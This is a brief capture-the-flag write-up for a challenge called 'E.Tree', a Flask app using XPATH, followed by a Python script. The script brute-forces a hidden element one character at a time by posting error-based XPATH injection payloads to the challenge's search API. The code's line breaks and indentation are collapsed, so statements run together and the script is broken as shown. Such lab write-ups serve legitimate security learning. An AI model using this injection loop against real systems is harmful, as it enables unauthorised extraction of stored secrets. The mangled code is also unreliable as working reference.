E.Tree was a Python Flask application that used XPATH to parse XML files. We were presented with an example XML file from where we could see that some users have an additional selfDestructCode element set. Knowing this, we were able to do an error-based XPATH injection to determine the flag.
Solution
import requestsimport stringfrom time import sleepflag_pt1 ="CHTB{Th3_3xTr4_l3v3l_"flag ="4Cc3s$_c0nTr0l}"url ="http://139.59.168.47:30661/api/search"# Each time a successful login is seen, restart looprestart =Truecount =len(flag)+1while restart: restart =Falsefor char in"_"+ string.ascii_letters + string.digits +"!#$%^()@{}£&*-=+.,~:;[]":# Update position index for the 2 seperate flag parts post_data = {"search": "' or substring((/military/district[position()=3]/staff[position()=2]/selfDestructCode)," + str(count) + ",1)=\"" + char + "\" or ''=' "}
print(post_data)try: r = requests.post(url, json=post_data, headers={'Content-Type': 'application/json'})exceptBaseException:pass# Correct char results in "successful password"if'exists'in r.text: restart =True count +=1 flag += charprint(flag)# Exit if "}" gives a valid redirectif char =="}":print("\nFlag: "+ flag)exit(0)breaksleep(1)
